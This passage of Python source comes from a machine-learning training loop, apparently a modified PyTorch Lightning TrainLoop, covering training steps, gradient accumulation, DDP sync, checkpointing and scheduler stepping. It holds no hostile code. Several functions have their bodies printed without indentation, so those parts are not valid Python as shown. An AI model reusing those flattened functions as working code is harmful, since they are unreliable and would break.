    self.accumulated_loss = None
    # Guards against running teardown twice.
    self._teardown_already_run = False
    # Overridden by on_trainer_init with the user's setting.
    self.automatic_optimization = True
    self._curr_step_result = None
    self._cur_grad_norm_dict = None
def on_trainer_init(
    self, max_epochs, min_epochs, max_steps, min_steps, num_sanity_val_steps, automatic_optimization
):
    """Initialize trainer-side counters, state flags and loop limits."""
    trainer = self.trainer

    trainer.global_step = 0
    trainer.current_epoch = 0
    trainer.interrupted = False
    trainer.should_stop = False
    trainer._state = TrainerState.INITIALIZING

    trainer.total_batch_idx = 0
    trainer.batch_idx = 0
    trainer.num_training_batches = 0
    trainer.train_dataloader = None
    self.automatic_optimization = automatic_optimization

    trainer.max_epochs = max_epochs
    trainer.min_epochs = min_epochs
    trainer.max_steps = max_steps
    trainer.min_steps = min_steps

    # -1 means "no limit" for the sanity-validation steps.
    trainer.num_sanity_val_steps = (
        float("inf") if num_sanity_val_steps == -1 else num_sanity_val_steps
    )
@property
def num_optimizers(self):
    """Number of optimizers active for the current batch."""
    return len(self.get_optimizers_iterable())
def should_skip_training(self):
    """True when there is nothing to train: epoch budget spent or zero batches."""
    trainer = self.trainer
    return trainer.current_epoch >= trainer.max_epochs or trainer.limit_train_batches == 0
def on_train_start(self):
    """Free cached GPU memory, then fire the ``on_train_start`` hook."""
    trainer = self.trainer
    if trainer.on_gpu and trainer.root_gpu is not None:
        # Empty the cache under an explicit device context; see
        # https://discuss.pytorch.org/t/out-of-memory-when-i-use-torch-cuda-empty-cache/57898
        with torch.cuda.device(f"cuda:{trainer.root_gpu}"):
            torch.cuda.empty_cache()

    trainer.call_hook("on_train_start")
def setup_fit(self, model, train_dataloader, val_dataloaders, datamodule):
    """Wire model, data and configuration checks together before fitting."""
    trainer = self.trainer

    # Bind logger and other trainer properties onto the model.
    trainer.model_connector.copy_trainer_model_properties(model)

    # Normalize the hparams namespace when the model has one.
    if hasattr(model, "hparams"):
        parsing.clean_namespace(model.hparams)

    # Attach dataloaders / datamodule to the trainer.
    trainer.data_connector.attach_data(model, train_dataloader, val_dataloaders, datamodule)

    # Fail fast on a mis-configured LightningModule.
    trainer.config_validator.verify_loop_configurations(model)
def setup_training(self, model: LightningModule):
    """Sanity check a few things before starting actual training.

    Order matters throughout: properties must be copied before AMP init,
    the barrier must precede pretrain hooks, and weights are restored
    before the pretrain-end hook.

    Args:
        model: The model to run sanity test on.
    """
    # --------------------------
    # Setup??
    # --------------------------
    # Unwrap DataParallel so hooks/properties hit the LightningModule.
    ref_model = model
    if self.trainer.data_parallel:
        ref_model = model.module

    # set the ranks and devices
    self.trainer.accelerator_backend.dist.rank = self.trainer.global_rank
    self.trainer.accelerator_backend.dist.device = ref_model.device

    # give model convenience properties
    ref_model.trainer = self.trainer

    # set local properties on the model
    self.trainer.model_connector.copy_trainer_model_properties(ref_model)

    # init amp. Must be done here instead of __init__ to allow ddp to work
    if self.trainer.amp_backend == AMPType.NATIVE and self.trainer.precision == 16 and not self.trainer.use_tpu:
        self.trainer.scaler = torch.cuda.amp.GradScaler()

    # log hyper-parameters
    if self.trainer.logger is not None:
        # save exp to get started (this is where the first experiment logs are written)
        self.trainer.logger.log_hyperparams(ref_model.hparams_initial)
        self.trainer.logger.log_graph(ref_model)
        self.trainer.logger.save()

    # wait for all processes to join if running distributed
    self.trainer.accelerator_backend.barrier("setup_training")

    # register auto-resubmit when on SLURM
    self.trainer.slurm_connector.register_slurm_signal_handlers()

    # --------------------------
    # Pre-train
    # --------------------------
    # on pretrain routine start (trainer-level hook, then module hook)
    self.trainer.on_pretrain_routine_start(ref_model)
    if self.trainer.is_function_implemented("on_pretrain_routine_start"):
        ref_model.on_pretrain_routine_start()

    # print model summary (rank zero only, not when testing)
    if self.trainer.is_global_zero and self.trainer.weights_summary is not None and not self.trainer.testing:
        if self.trainer.weights_summary in ModelSummary.MODES:
            ref_model.summarize(mode=self.trainer.weights_summary)
        else:
            raise MisconfigurationException("weights_summary can be None, " + ", ".join(ModelSummary.MODES))

    # track model now.
    # if cluster resets state, the model will update with the saved weights
    self.trainer.model = model

    # restore training state and model weights before hpc is called
    self.trainer.checkpoint_connector.restore_weights(model)

    # on pretrain routine end (trainer-level hook, then module hook)
    self.trainer.on_pretrain_routine_end(ref_model)
    if self.trainer.is_function_implemented("on_pretrain_routine_end"):
        ref_model.on_pretrain_routine_end()
def on_train_end(self):
    """Run end-of-training teardown exactly once.

    Saves a final checkpoint, fires hooks, finalizes loggers/profiler,
    lets the accelerator clean up, and moves the model off the GPU.
    """
    if self._teardown_already_run:
        return

    self._teardown_already_run = True

    # trigger checkpoint check. need to temporarily decrease the global step
    # to avoid saving duplicates when a checkpoint was saved at the last step
    self.trainer.global_step -= 1
    self.check_checkpoint_callback(should_save=True, is_last=True)
    self.trainer.global_step += 1

    # hook
    self.trainer.call_hook("on_train_end")

    # kill loggers
    if self.trainer.logger is not None:
        self.trainer.logger.finalize("success")

    # summarize profile results (rank zero only)
    if self.trainer.global_rank == 0:
        self.trainer.profiler.describe()

    # give accelerators a chance to finish
    self.trainer.accelerator_backend.on_train_end()

    # move model off the GPU and release cached memory
    if self.trainer.on_gpu:
        model = self.trainer.get_model()
        model.cpu()
        torch.cuda.empty_cache()
def check_checkpoint_callback(self, should_save, is_last=False):
    """Invoke ModelCheckpoint callbacks outside the normal validation path."""
    # TODO bake this logic into the checkpoint callback
    if not (should_save and self.trainer.checkpoint_connector.has_trained):
        return

    checkpoint_callbacks = [cb for cb in self.trainer.callbacks if isinstance(cb, ModelCheckpoint)]

    if is_last and any(cb.save_last for cb in checkpoint_callbacks):
        rank_zero_info("Saving latest checkpoint...")

    model = self.trainer.get_model()
    for cb in checkpoint_callbacks:
        cb.on_validation_end(self.trainer, model)
def on_train_epoch_start(self, epoch):
    """Prepare trainer state, dataloaders and accumulators for a new epoch."""
    trainer = self.trainer

    # Advance the trainer's notion of the current epoch.
    trainer.current_epoch = epoch

    model = trainer.get_model()

    # Optionally rebuild the train dataloader each epoch.
    if trainer.reload_dataloaders_every_epoch:
        trainer.reset_train_dataloader(model)

    # Seed the distributed sampler so shuffling differs per epoch;
    # samplers without set_epoch are silently skipped.
    try:
        trainer.train_dataloader.sampler.set_epoch(epoch)
    except Exception:
        pass

    # Let the accumulation scheduler adjust accumulate_grad_batches.
    trainer.accumulation_scheduler.on_epoch_start(trainer, trainer.get_model())

    # Fresh running accumulator over per-batch loss fractions.
    self.accumulated_loss = TensorRunningAccum(window_length=trainer.accumulate_grad_batches)

    # Fresh structured-result accumulators for the callbacks.
    self.early_stopping_accumulator = Accumulator()
    self.checkpoint_accumulator = Accumulator()

    trainer.call_hook("on_epoch_start")
    trainer.call_hook("on_train_epoch_start")
def on_train_batch_end(self, epoch_output, epoch_end_outputs, batch, batch_idx, dataloader_idx):
    """Run batch-end hooks and fold this step's outputs into the epoch output."""
    call_hook = self.trainer.call_hook
    call_hook('on_batch_end')
    call_hook('on_train_batch_end', epoch_end_outputs, batch, batch_idx, dataloader_idx)

    # Keep what epoch_end will need to reduce later.
    self.track_epoch_end_reduce_metrics(epoch_output, epoch_end_outputs)

    # Reset per-batch logger internals.
    self.trainer.logger_connector.on_train_batch_end()
def reset_train_val_dataloaders(self, model):
    """(Re)build dataloaders up front unless they reload every epoch anyway."""
    reload_each_epoch = self.trainer.reload_dataloaders_every_epoch

    if not reload_each_epoch:
        self.trainer.reset_train_dataloader(model)

    if self.trainer.val_dataloaders is None and not reload_each_epoch:
        self.trainer.reset_val_dataloader(model)
def track_epoch_end_reduce_metrics(self, epoch_output, epoch_end_outputs):
    """Append each optimizer's step outputs to the epoch-level collection."""
    for opt_idx, opt_outputs in enumerate(epoch_end_outputs):
        # A single non-Result entry (no tbptt) is stored unwrapped.
        single_plain_step = (
            isinstance(opt_outputs, list)
            and len(opt_outputs) == 1
            and not isinstance(opt_outputs[0], Result)
        )
        if single_plain_step:
            opt_outputs = opt_outputs[0]
        epoch_output[opt_idx].append(opt_outputs)
def get_optimizers_iterable(self):
    """Return the (index, optimizer) pairs active for the current batch.

    Without optimizer frequencies every optimizer runs each step; with
    frequencies, exactly one optimizer is selected round-robin according
    to its share of the cumulative frequency cycle.
    """
    frequencies = self.trainer.optimizer_frequencies
    if not frequencies:
        # call training_step once per optimizer
        return list(enumerate(self.trainer.optimizers))

    freq_cumsum = np.cumsum(frequencies)
    cycle_length = freq_cumsum[-1]
    position = self.trainer.total_batch_idx % cycle_length
    # First cumulative bucket strictly beyond the current position.
    opt_idx = np.argmax(freq_cumsum > position)
    return [[opt_idx, self.trainer.optimizers[opt_idx]]]
def on_after_backward(self, training_step_output, batch_idx, untouched_loss):
    """Detach the step output from the graph, then fire the after-backward hook."""
    if isinstance(training_step_output, Result):
        training_step_output.detach()
    else:
        training_step_output.batch_loss = training_step_output.batch_loss.detach()

    # insert after step hook
    self.trainer.call_hook("on_after_backward")

    # track losses when dev-debugging is enabled
    self.trainer.dev_debugger.track_train_loss_history(batch_idx, untouched_loss.detach())
def _check_training_step_output(self, training_step_output):
if isinstance(training_step_output, torch.Tensor) and not self.automatic_optimization:
if training_step_output.grad_fn is None:
# TODO: Find why - RuntimeError: Expected to mark a variable ready only once ...
raise MisconfigurationException("In manual optimization, `training_step` should not return a Tensor")
def training_step(self, split_batch, batch_idx, opt_idx, hiddens):
    """Run one forward/training step and package its outputs.

    Calls the accelerator's ``training_step``, validates and
    post-processes the result, and (under automatic optimization)
    scales the loss for gradient accumulation.

    Returns:
        AttributeDict with closure_loss (scaled), loss (detached,
        unscaled), the processed step output, the epoch-end variant,
        and hiddens — or None when the step returned nothing.
    """
    # give the PL module a result for logging
    model_ref = self.trainer.get_model()

    with self.trainer.profiler.profile("model_forward"):
        args = self.build_train_args(split_batch, batch_idx, opt_idx, hiddens)

        # manually capture logged metrics
        model_ref._current_fx_name = 'training_step'
        training_step_output = self.trainer.accelerator_backend.training_step(args)
        self.trainer.logger_connector.cache_logged_metrics()

        self._check_training_step_output(training_step_output)

        training_step_output = self.trainer.call_hook("training_step_end", training_step_output)

        training_step_output_for_epoch_end, training_step_output = self._process_training_step_output(
            training_step_output, split_batch
        )
        is_result_obj = isinstance(training_step_output, Result)

        if training_step_output_for_epoch_end is None:
            return None

    # enable empty loss when using manual opt
    closure_loss = None
    untouched_loss = None

    if self.trainer.train_loop.automatic_optimization:
        # accumulate loss
        # (if accumulate_grad_batches = 1 no effect)
        if is_result_obj:
            closure_loss = training_step_output.minimize
        else:
            closure_loss = training_step_output.batch_loss

        closure_loss = closure_loss / self.trainer.accumulate_grad_batches

        # the loss will get scaled for amp. avoid any modifications to it
        untouched_loss = closure_loss.detach().clone()

    # result
    result = AttributeDict(
        closure_loss=closure_loss,
        loss=untouched_loss,
        training_step_output=training_step_output,
        training_step_output_for_epoch_end=training_step_output_for_epoch_end,
        hiddens=training_step_output.hiddens,
    )
    return result
def _process_training_step_output(self, training_step_output, split_batch):
    """Normalize a raw ``training_step`` return into (epoch-end output, step output).

    Dispatches between the deprecated ``Result`` path, the 1.0-style
    dict/Tensor path, and the legacy ``log``/``progress_bar`` dict path.
    """
    training_step_output_for_epoch_end = training_step_output

    # enable validation_step return None
    if training_step_output_for_epoch_end is None:
        return None, None

    # -----------------------------------------
    # process result return (DEPRECATE in 1.0)
    # -----------------------------------------
    if isinstance(training_step_output, Result):
        training_step_output_for_epoch_end = self._process_result(training_step_output, split_batch)
        return training_step_output_for_epoch_end, training_step_output

    # -----------------------------------------
    # process hybrid (1.0)
    # -----------------------------------------
    # no need for these checks in 1.0.0
    # TODO: remove checks in 1.0.0
    is_tensor = isinstance(training_step_output_for_epoch_end, torch.Tensor)
    is_1_0_output = is_tensor or ("log" not in training_step_output and "progress_bar" not in training_step_output)
    if is_1_0_output:
        return self._process_training_step_output_1_0(training_step_output, split_batch)

    # -----------------------------------------
    # process old dict (deprecate 1.0)
    # -----------------------------------------
    training_step_output = self.trainer.process_dict_result(training_step_output, train=True)

    training_step_output = AttributeDict(
        batch_loss=training_step_output[0],
        pbar_on_batch_end=training_step_output[1],
        log_metrics=training_step_output[2],
        callback_metrics=training_step_output[3],
        hiddens=training_step_output[4],
    )
    # if the user decides to finally reduce things in epoch_end, save raw output without graphs
    if isinstance(training_step_output_for_epoch_end, torch.Tensor):
        training_step_output_for_epoch_end = training_step_output_for_epoch_end.detach()
    else:
        training_step_output_for_epoch_end = recursive_detach(training_step_output_for_epoch_end)

    return training_step_output_for_epoch_end, training_step_output
def _process_training_step_output_1_0(self, training_step_output, split_batch):
    """Map a 1.0-style ``training_step`` return (dict or scalar Tensor) onto the
    module's internal ``Result`` object and return (detached epoch-end copy, result)."""
    result = self.trainer.get_model()._results

    loss = None
    hiddens = None

    # handle dict return
    if isinstance(training_step_output, dict):
        loss = training_step_output.pop("loss", None)
        hiddens = training_step_output.pop("hiddens", None)
        result["extra"] = training_step_output

    # handle scalar return
    elif isinstance(training_step_output, torch.Tensor):
        loss = training_step_output
        result["extra"] = {}

    # map to results under the hood
    result.minimize = loss
    result.hiddens = hiddens

    # track batch for manual reduction with result
    result.track_batch_size(len(split_batch))

    # track metrics without grads for epoch reduction
    training_step_output_for_epoch_end = copy(result)
    training_step_output_for_epoch_end.detach()
    if self.trainer.move_metrics_to_cpu:
        training_step_output_for_epoch_end.cpu()

    # what flows back into the system
    training_step_output = result

    return training_step_output_for_epoch_end, training_step_output
def _process_result(self, training_step_output, split_batch):
    """Handle deprecated ``TrainResult``/``EvalResult`` returns (pre-1.0 path).

    Warns about the deprecation, rejects ``EvalResult``, and returns a
    detached copy for epoch-end aggregation.
    """
    training_step_output.track_batch_size(len(split_batch))
    m = """
TrainResult and EvalResult were deprecated in 0.9.1 and support will drop in 1.0.0.
Use self.log and .write from the LightningModule to log metrics and write predictions.
training_step can now only return a scalar (for the loss) or a dictionary with anything you want.
Option 1:
return loss
Option 2:
return {'loss': loss, 'anything_else': ...}
Option 3:
return {'loss': loss, 'hiddens': hiddens, 'anything_else': ...}
"""
    rank_zero_warn(m)

    # don't allow EvalResult in the training_step
    if isinstance(training_step_output, EvalResult):
        raise MisconfigurationException(
            "training_step cannot return EvalResult, " "use a dict or TrainResult instead"
        )

    training_step_output_for_epoch_end = copy(training_step_output)
    training_step_output_for_epoch_end.detach()

    return training_step_output_for_epoch_end
def optimizer_step(self, optimizer, opt_idx, batch_idx, train_step_and_backward_closure):
    """Delegate the optimizer step (wrapping the forward/backward closure) to the accelerator backend."""
    with self.trainer.profiler.profile("optimizer_step"):
        # optimizer step lightningModule hook
        self.trainer.accelerator_backend.optimizer_step(
            optimizer, batch_idx, opt_idx, train_step_and_backward_closure
        )
def on_before_zero_grad(self, optimizer):
    """Fire the ``on_before_zero_grad`` hook for *optimizer*."""
    self.trainer.call_hook('on_before_zero_grad', optimizer)
def optimizer_zero_grad(self, batch_idx, optimizer, opt_idx):
    """Delegate ``zero_grad`` for *optimizer* to the accelerator backend."""
    self.trainer.accelerator_backend.optimizer_zero_grad(batch_idx, optimizer, opt_idx)
def track_and_norm_grad(self, optimizer):
    """Record gradient norms (when enabled), then clip gradients for *optimizer*.

    The computed norms are stashed in ``self._cur_grad_norm_dict`` for the
    caller to aggregate/log.
    """
    # track gradient norms
    grad_norm_dic = self._track_gradient_norm()

    # clip gradients
    self.trainer.accelerator_backend.clip_gradients(optimizer)
    self._cur_grad_norm_dict = grad_norm_dic
def _track_gradient_norm(self):
grad_norm_dict = {}
if (self.trainer.global_step + 1) % self.trainer.log_every_n_steps == 0:
if float(self.trainer.track_grad_norm) > 0:
model = self.trainer.get_model()
grad_norm_dict = model.grad_norm(self.trainer.track_grad_norm)
return grad_norm_dict
def process_hiddens(self, opt_closure_result):
    """Extract the hidden state carried across TBPTT splits.

    For ``Result`` outputs, also drops the hiddens from the epoch-end copy so
    they are not retained for the whole epoch.
    """
    hiddens = opt_closure_result.hiddens
    if isinstance(opt_closure_result.training_step_output, Result):
        opt_closure_result.training_step_output_for_epoch_end.drop_hiddens()
    return hiddens
def tbptt_split_batch(self, batch):
    """Split *batch* along time for truncated BPTT; a single split when disabled."""
    tbptt_steps = self.trainer.truncated_bptt_steps
    if tbptt_steps is None:
        return [batch]
    lightning_module = self.trainer.get_model()
    with self.trainer.profiler.profile("tbptt_split_batch"):
        return lightning_module.tbptt_split_batch(batch, tbptt_steps)
def run_training_epoch(self):
    """Run one full training epoch: iterate batches, run validation when due,
    step LR schedulers, and emit epoch-end hooks/metrics."""
    # get model
    model = self.trainer.get_model()

    # modify dataloader if needed (ddp, etc...)
    train_dataloader = self.trainer.accelerator_backend.process_dataloader(self.trainer.train_dataloader)

    # track epoch output
    epoch_output = [[] for _ in range(self.num_optimizers)]

    # enable profiling for the dataloader
    train_dataloader = self.trainer.data_connector.get_profiled_train_dataloader(train_dataloader)
    dataloader_idx = 0
    should_check_val = False
    for batch_idx, (batch, is_last_batch) in train_dataloader:

        self.trainer.batch_idx = batch_idx

        # ------------------------------------
        # TRAINING_STEP + TRAINING_STEP_END
        # ------------------------------------
        batch_output = self.run_training_batch(batch, batch_idx, dataloader_idx)

        # when returning -1 from train_step, we end epoch early
        if batch_output.signal == -1:
            break

        # only track outputs when user implements training_epoch_end
        # otherwise we will build up unnecessary memory
        epoch_end_outputs = self.process_train_step_outputs(
            batch_output.training_step_output_for_epoch_end,
            self.early_stopping_accumulator,
            self.checkpoint_accumulator,
        )

        # hook
        # TODO: add outputs to batches
        self.on_train_batch_end(epoch_output, epoch_end_outputs, batch, batch_idx, dataloader_idx)

        # -----------------------------------------
        # SAVE METRICS TO LOGGERS
        # -----------------------------------------
        self.trainer.logger_connector.log_train_step_metrics(batch_output)

        # -----------------------------------------
        # VALIDATE IF NEEDED + CHECKPOINT CALLBACK
        # -----------------------------------------
        should_check_val = self.should_check_val_fx(batch_idx, is_last_batch)
        if should_check_val:
            self.trainer.run_evaluation(test_mode=False)
            # reset stage to train
            self.trainer.logger_connector.set_stage("train")

        # -----------------------------------------
        # SAVE LOGGERS (ie: Tensorboard, etc...)
        # -----------------------------------------
        self.save_loggers_on_train_batch_end()

        # update LR schedulers
        monitor_metrics = deepcopy(self.trainer.logger_connector.callback_metrics)
        self.update_train_loop_lr_schedulers(monitor_metrics=monitor_metrics)
        self.trainer.checkpoint_connector.has_trained = True

        # max steps reached, end training
        if self.trainer.max_steps is not None and self.trainer.max_steps == self.trainer.global_step + 1:
            accumulation_done = self._accumulated_batches_reached()
            # Ensure accumulation across batches has completed before breaking loop
            if accumulation_done:
                break

        # end epoch early
        # stop when the flag is changed or we've gone past the amount
        # requested in the batches
        if self.trainer.should_stop:
            break

        self.trainer.total_batch_idx += 1

        # stop epoch if we limited the number of training batches
        if (batch_idx + 1) >= self.trainer.num_training_batches:
            break

        # progress global step according to grads progress
        self.increment_accumulated_grad_global_step()

    # epoch end hook
    self.run_on_epoch_end_hook(epoch_output)

    # log epoch metrics
    self.trainer.logger_connector.log_train_epoch_end_metrics(
        epoch_output,
        self.checkpoint_accumulator,
        self.early_stopping_accumulator,
        self.num_optimizers
    )

    # when no val loop is present or fast-dev-run still need to call checkpoints
    self.check_checkpoint_callback(not (should_check_val or is_overridden('validation_step', model)))

    # increment the global step once
    # progress global step according to grads progress
    self.increment_accumulated_grad_global_step()
def run_training_batch(self, batch, batch_idx, dataloader_idx):
    """Run one training batch across all TBPTT splits and active optimizers.

    Returns an ``AttributeDict`` with ``signal`` (0 ok, -1 stop epoch), the
    collected gradient-norm dict, and the per-optimizer step outputs for
    epoch-end aggregation.
    """
    # track grad norms
    grad_norm_dic = {}

    # bookkeeping
    # (removed dead local `using_results_obj`, which was assigned but never read)
    self.trainer.hiddens = None

    # track all outputs across time and num of optimizers
    batch_outputs = [[] for _ in range(len(self.get_optimizers_iterable()))]

    if batch is None:
        return AttributeDict(signal=0, grad_norm_dic=grad_norm_dic)

    # hook
    response = self.trainer.call_hook("on_batch_start")
    if response == -1:
        return AttributeDict(signal=-1, grad_norm_dic=grad_norm_dic)

    # hook
    response = self.trainer.call_hook("on_train_batch_start", batch, batch_idx, dataloader_idx)
    if response == -1:
        return AttributeDict(signal=-1, grad_norm_dic=grad_norm_dic)

    # lightning module hook
    splits = self.tbptt_split_batch(batch)

    for split_idx, split_batch in enumerate(splits):

        # create an iterable for optimizers and loop over them
        for opt_idx, optimizer in self.prepare_optimizers():

            # toggle model params + set info to logger_connector
            self.run_train_split_start(split_idx, split_batch, opt_idx, optimizer)

            if self.should_accumulate():
                # For gradient accumulation

                # -------------------
                # calculate loss (train step + train step end)
                # -------------------

                # perform dpp sync only when performing optimizer_step
                with self.block_ddp_sync_behaviour():
                    self.training_step_and_backward(split_batch, batch_idx, opt_idx, optimizer, self.trainer.hiddens)

                batch_outputs = self._process_closure_result(
                    batch_outputs=batch_outputs,
                    opt_idx=opt_idx,
                )

            # ------------------------------
            # BACKWARD PASS
            # ------------------------------
            # gradient update with accumulated gradients

            else:
                if self.automatic_optimization:

                    def train_step_and_backward_closure():
                        result = self.training_step_and_backward(
                            split_batch,
                            batch_idx,
                            opt_idx,
                            optimizer,
                            self.trainer.hiddens
                        )
                        return None if result is None else result.loss

                    # optimizer step
                    self.optimizer_step(optimizer, opt_idx, batch_idx, train_step_and_backward_closure)

                else:
                    self._curr_step_result = self.training_step(
                        split_batch,
                        batch_idx,
                        opt_idx,
                        self.trainer.hiddens
                    )

                if self._curr_step_result is None:
                    # user decided to skip optimization
                    # make sure to zero grad.
                    self.zero_grad_handler(batch_idx, optimizer, opt_idx)
                    continue

                batch_outputs = self._process_closure_result(
                    batch_outputs=batch_outputs,
                    opt_idx=opt_idx,
                )

                # todo: Properly aggregate grad_norm accros opt_idx and split_idx
                grad_norm_dic = self._cur_grad_norm_dict
                self._cur_grad_norm_dict = None

                # hook + clear gradients
                self.zero_grad_handler(batch_idx, optimizer, opt_idx)

                # update running loss + reset accumulated loss
                self.update_running_loss()

    result = AttributeDict(
        signal=0,
        grad_norm_dic=grad_norm_dic,
        training_step_output_for_epoch_end=batch_outputs,
    )
    return result
@contextmanager
def block_ddp_sync_behaviour(self):
    """Temporarily disable DDP gradient all-reduce while accumulating gradients.

    Bug fix: the previous implementation did ``yield self.trainer.model.no_sync()``,
    which hands the ``no_sync()`` context-manager object to the caller without ever
    entering it — so gradient synchronization was never actually blocked. Entering
    it here with ``with`` applies the intended behaviour. For non-DDP models this
    is a no-op.
    """
    if isinstance(self.trainer.model, torch.nn.parallel.DistributedDataParallel):
        with self.trainer.model.no_sync():
            yield None
    else:
        yield None
def _process_closure_result(
    self, batch_outputs: list, opt_idx: int
) -> list:
    """Consume ``self._curr_step_result``: cache metrics, track hiddens,
    NaN-check the loss, and append the epoch-end output for *opt_idx*.

    Always clears ``self._curr_step_result`` before returning.
    """
    opt_closure_result = self._curr_step_result

    if opt_closure_result is not None:

        # cache metrics
        self.trainer.logger_connector.cache_training_step_metrics(opt_closure_result)

        # track hiddens
        self.trainer.hiddens = self.process_hiddens(opt_closure_result)

        # check if loss or model weights are nan
        if self.trainer.terminate_on_nan:
            self.trainer.detect_nan_tensors(opt_closure_result.loss)

        # track all the outputs across all steps
        batch_opt_idx = opt_idx if len(batch_outputs) > 1 else 0
        batch_outputs[batch_opt_idx].append(opt_closure_result.training_step_output_for_epoch_end)

        if self.automatic_optimization:
            # track total loss for logging (avoid mem leaks)
            self.accumulated_loss.append(opt_closure_result.loss)

    self._curr_step_result = None

    return batch_outputs
def training_step_and_backward(self, split_batch, batch_idx, opt_idx, optimizer, hiddens):
    """
    Wrap the forward step in a closure so second order methods work.

    Runs ``training_step`` and (in automatic optimization) the backward pass,
    firing ``on_after_backward`` once gradients have finished accumulating.
    Returns the step result, or ``None`` when the step produced nothing.
    """
    # lightning module hook
    result = self.training_step(split_batch, batch_idx, opt_idx, hiddens)
    self._curr_step_result = result

    if result is None:
        self.warning_cache.warn("training_step returned None if it was on purpose, ignore this warning...")
        return None

    if self.trainer.train_loop.automatic_optimization:
        # backward pass
        with self.trainer.profiler.profile("model_backward"):
            self.backward(result, optimizer, opt_idx)

        # hook - call this hook only
        # when gradients have finished to accumulate
        if not self.should_accumulate():
            self.on_after_backward(result.training_step_output, batch_idx, result.loss)

        # check if loss or model weights are nan
        if self.trainer.terminate_on_nan:
            self.trainer.detect_nan_tensors(result.loss)

    return result
def backward(self, result, optimizer, opt_idx, *args, **kwargs):
    """Run the backward pass via the accelerator backend.

    Accepts either a bare loss ``Tensor`` (manual backward) or a step result
    carrying ``closure_loss``. At optimizer-step boundaries gradients are also
    tracked and clipped.
    """
    self.trainer.dev_debugger.track_event("backward_call")

    # backward can be called manually in the training loop
    if isinstance(result, torch.Tensor):
        self.trainer.accelerator_backend.backward(result, optimizer, opt_idx, *args, **kwargs)
    else:
        result.closure_loss = self.trainer.accelerator_backend.backward(
            result.closure_loss, optimizer, opt_idx, *args, **kwargs
        )

    if not self.should_accumulate():
        # track gradients
        self.track_and_norm_grad(optimizer=optimizer)
def update_train_loop_lr_schedulers(self, monitor_metrics=None):
    """Step ``interval="step"`` LR schedulers at effective optimizer-step boundaries."""
    window_done = self._accumulated_batches_reached()
    epoch_done = self._num_training_batches_reached()

    if window_done or epoch_done:
        # update lr
        self.trainer.optimizer_connector.update_learning_rates(interval="step", monitor_metrics=monitor_metrics)
def run_on_epoch_end_hook(self, epoch_output):
    """Fire the epoch-end hooks and let the logger connector finalize the epoch."""
    self.trainer.call_hook('on_epoch_end')
    self.trainer.call_hook('on_train_epoch_end', epoch_output)

    self.trainer.logger_connector.on_train_epoch_end()
def increment_accumulated_grad_global_step(self):
    """Advance the trainer's ``global_step`` once per effective optimizer step."""
    window_done = self._accumulated_batches_reached()
    epoch_done = self._num_training_batches_reached()

    # progress global step according to grads progress
    if window_done or epoch_done:
        self.trainer.global_step += 1
def _accumulated_batches_reached(self):
return (self.trainer.batch_idx + 1) % self.trainer.accumulate_grad_batches == 0
def _num_training_batches_reached(self):
return (self.trainer.batch_idx + 1) == self.trainer.num_training_batches
def should_accumulate(self):
    """True while gradients should keep accumulating (i.e. no optimizer step yet)."""
    # checks if backward or backward + optimizer step (via closure)
    window_done = self._accumulated_batches_reached()
    epoch_done = self._num_training_batches_reached()
    return not window_done and not epoch_done
def should_check_val_fx(self, batch_idx, is_last_batch):
    """Decide whether the validation loop should run after this training batch."""
    trainer = self.trainer

    # validation must be enabled and the epoch eligible per check_val_every_n_epoch
    epoch_eligible = (trainer.current_epoch + 1) % trainer.check_val_every_n_epoch == 0
    if not (trainer.enable_validation and epoch_eligible):
        return False

    hit_val_interval = (batch_idx + 1) % trainer.val_check_batch == 0
    # an infinite val_check_batch means "validate at the end of an infinite dataset"
    infinite_dataset_end = is_last_batch and trainer.val_check_batch == float("inf")
    return hit_val_interval or trainer.should_stop or infinite_dataset_end
def build_train_args(self, batch, batch_idx, opt_idx, hiddens):
    """Assemble the positional argument list for the user's ``training_step``.

    ``optimizer_idx`` is only passed when multiple optimizers are configured;
    ``hiddens`` is only passed when truncated BPTT is enabled.
    """
    args = [batch, batch_idx]

    if len(self.trainer.optimizers) > 1:
        if not self.trainer.has_arg("training_step", "optimizer_idx"):
            num_opts = len(self.trainer.optimizers)
            raise ValueError(
                f"Your LightningModule defines {num_opts} optimizers but "
                f'training_step is missing the "optimizer_idx" argument.'
            )
        args.append(opt_idx)

    # pass hiddens if using tbptt
    if self.trainer.truncated_bptt_steps is not None:
        args.append(hiddens)

    return args
def save_loggers_on_train_batch_end(self):
    """Flush logger state to disk when the flush schedule (or fast-dev-run) requires it."""
    trainer = self.trainer
    if not (trainer.logger_connector.should_flush_logs or trainer.fast_dev_run):
        return
    # only rank zero writes, and only when a logger is attached
    if trainer.is_global_zero and trainer.logger is not None:
        trainer.logger.save()
def process_train_step_outputs(self, all_train_step_outputs, early_stopping_accumulator, checkpoint_accumulator):
    """
    Figure out what needs to be tracked/logged at the end of the epoch.

    Feeds legacy ``early_stop_on``/``checkpoint_on`` values into the given
    accumulators and keeps per-optimizer outputs only when they will be
    reduced at epoch end (automatically or by a user ``training_epoch_end``).
    """
    # the training step outputs a list per optimizer. The list contains the outputs at each time step
    # when no TBPTT is used, then the list has 1 item per batch
    # when TBPTT IS used, then the list has n items (1 per time step)
    epoch_end_outputs = []
    for optimizer_idx_outputs in all_train_step_outputs:
        # extract one representative sample from each time step (1 if no tbptt) and 0th optimizer
        if len(optimizer_idx_outputs) == 0:
            continue

        sample_output = optimizer_idx_outputs[-1]

        # pull out callback info if available (ie: Results object)
        if isinstance(sample_output, dict) and "early_stop_on" in sample_output:
            early_stopping_accumulator.accumulate(sample_output["early_stop_on"])

        if isinstance(sample_output, dict) and "checkpoint_on" in sample_output:
            checkpoint_accumulator.accumulate(sample_output["checkpoint_on"])

        # decide if we need to reduce at the end of the epoch automatically
        auto_reduce_tng_result = isinstance(sample_output, Result) and sample_output.should_reduce_on_epoch_end

        # only track when a) it needs to be autoreduced OR b) the user wants to manually reduce on epoch end
        if is_overridden("training_epoch_end", model=self.trainer.get_model()) or auto_reduce_tng_result:
            epoch_end_outputs.append(optimizer_idx_outputs)

    return epoch_end_outputs
def prepare_optimizers(self):
    """Return the (index, optimizer) pairs for this batch.

    In manual optimization the loop body is executed once, so only the first
    pair is returned.
    """
    optimizers = self.get_optimizers_iterable()
    return optimizers if self.automatic_optimization else [optimizers[0]]
def run_train_split_start(self, split_idx, split_batch, opt_idx, optimizer):
    """Prepare one (split, optimizer) iteration: toggle grads and inform the logger connector."""
    # set split_idx to trainer for tracking
    self.trainer.split_idx = split_idx

    # make sure only the gradients of the current optimizer's parameters are calculated
    # in the training step to prevent dangling gradients in multiple-optimizer setup.
    if self.automatic_optimization and len(self.trainer.optimizers) > 1:
        model = self.trainer.get_model()
